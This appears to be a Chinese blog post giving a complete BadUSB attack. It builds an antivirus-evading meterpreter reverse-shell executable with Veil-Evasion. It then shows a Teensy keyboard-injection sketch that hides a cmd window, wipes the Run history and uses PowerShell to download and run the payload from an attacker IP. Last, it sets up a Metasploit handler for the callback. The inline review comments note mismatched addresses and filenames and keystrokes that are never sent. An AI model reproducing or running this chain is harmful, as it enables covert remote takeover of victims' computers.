H4rdy's blogs - BadUSB插谁谁怀孕

演示视频
0x1 利用veil编码打造免杀的meterpreter

root@kali:~# veil-evasion //启动veil

[>] Please enter a command: list //查看可选列表

26) python/meterpreter/rev_tcp

[>] Please enter a command: 26 //这里选择编号为26的payload

[>] Please enter a command: set LHOST 192.168.31.233 //设置LHOST,即 payload 回连的攻击机地址。注意本文示例中这个地址(192.168.31.233)与 0x2 脚本里托管 payload 的 192.168.1.121 并不相同;若只用一台攻击机,两处应填同一 IP,且目标机必须能访问到它

[>] Please enter a command: generate //对payload进行编码
[*] Press [enter] for 'payload'
[>] Please enter the base name for output files: a //输入生成的payload名字

[>] Please enter the number of your choice: 1 //选择把 Python payload 打包成 exe 的方式(Veil-Evasion 此处列出的是 Pyinstaller / Py2Exe 之类的打包器),并不是"编码方式"

[*] Executable written to: /root/veil-output/compiled/a1.exe //生成的 payload 位置。注意文件名是 a1.exe,而 0x2 的脚本下载的是 1.exe,放到 Web 服务器前需要重命名,或者改脚本里的 URL

0x2 将执行代码写入badusb中

void setup() {               // Runs once after the board enumerates as a USB keyboard; the whole payload lives here.
                             // Assumes a Windows host with an unlocked desktop and a writable D: drive (see the download line below).
delay(5000);                // Give the host time to finish enumerating the HID device before typing, so no keystrokes are lost.
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);    // hold Win
Keyboard.set_key1(KEY_R);                                      // + R
Keyboard.send_now();                                           // Win+R opens the Run dialog
delay(100);
Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");

// Run dialog: start cmd.exe with colour 01 (black background, blue text - about as low-contrast as cmd gets)
// and immediately shrink the console to 16x1 so the typed commands are practically invisible on screen.
// NOTE(review): MODIFIERKEY_RIGHT_GUI set above is never explicitly released before the next send_now();
// whether the Enter below goes out as plain Enter or as Win+Enter depends on Keyboard.print() resetting
// the modifier state internally - confirm against the Teensy Keyboard implementation in use.
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
delay(300);
Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); // wipe the Win+R (RunMRU) history; /f skips the confirmation prompt
// NOTE(review): this only hides the Run entry; the downloaded file, the console session and anything that
// logs cmd/PowerShell activity on the host are left untouched.
Keyboard.set_key1(KEY_ENTER);    // Redundant: println() already typed the newline, so this is a second Enter (an empty line at the prompt).
Keyboard.send_now();
Keyboard.println("powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.121/1.exe','D:\\1.exe')");   // fetch the stage-0 executable
// NOTE(review): plain HTTP, hard-coded IP and file name, no integrity check. The URL must match where the veil
// output is actually hosted (section 0x1 produced a1.exe and used LHOST 192.168.31.233 - neither matches this line
// as written), and the download fails without the sketch noticing on a host that has no writable D: drive.
Keyboard.set_key1(KEY_ENTER);    // again a second Enter after println()
Keyboard.send_now();
Keyboard.set_modifier(0);        // release everything before the long wait
Keyboard.set_key1(0);
Keyboard.send_now();
delay(3000);                                                    // Fixed wait for the download; nothing checks that it completed before the next line tries to run it.
Keyboard.println("d:\\1.exe");                                       // run the downloaded executable (the newline from println() submits the command)
Keyboard.set_key1(KEY_ENTER);    // NOTE(review): dead - no send_now() follows and the key is cleared two lines down, so this Enter is never transmitted.
delay(300);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.set_modifier(MODIFIERKEY_ALT);    // Alt+Space opens the console window's system menu ...
Keyboard.set_key1(KEY_SPACE);
Keyboard.set_key2(KEY_C);                  // ... and C selects "Close"
Keyboard.send_now();
Keyboard.set_modifier(0);                  // release all keys so nothing stays held down
Keyboard.set_key1(0);
Keyboard.set_key2(0);
Keyboard.send_now();                                              // close the cmd window
    }
   // Arduino main loop. Intentionally empty: the payload runs exactly once from setup(),
   // so there is nothing to repeat here.
   void loop() {
   }

0x3 启动监听,等待回连
msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=4444 E //开始监听,等待连接。说明:这里的 LHOST=0.0.0.0 只是让 handler 监听本机所有网卡,payload 实际回连的是 0x1 里 set LHOST 指定的 192.168.31.233;LPORT 必须和 payload 里的端口一致(本文在 veil 中没有显式 set LPORT,依赖其默认值,建议显式设置后核对)。另外 msfcli 在较新的 Metasploit 中已被移除,可改用 msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 0.0.0.0; set LPORT 4444; run"
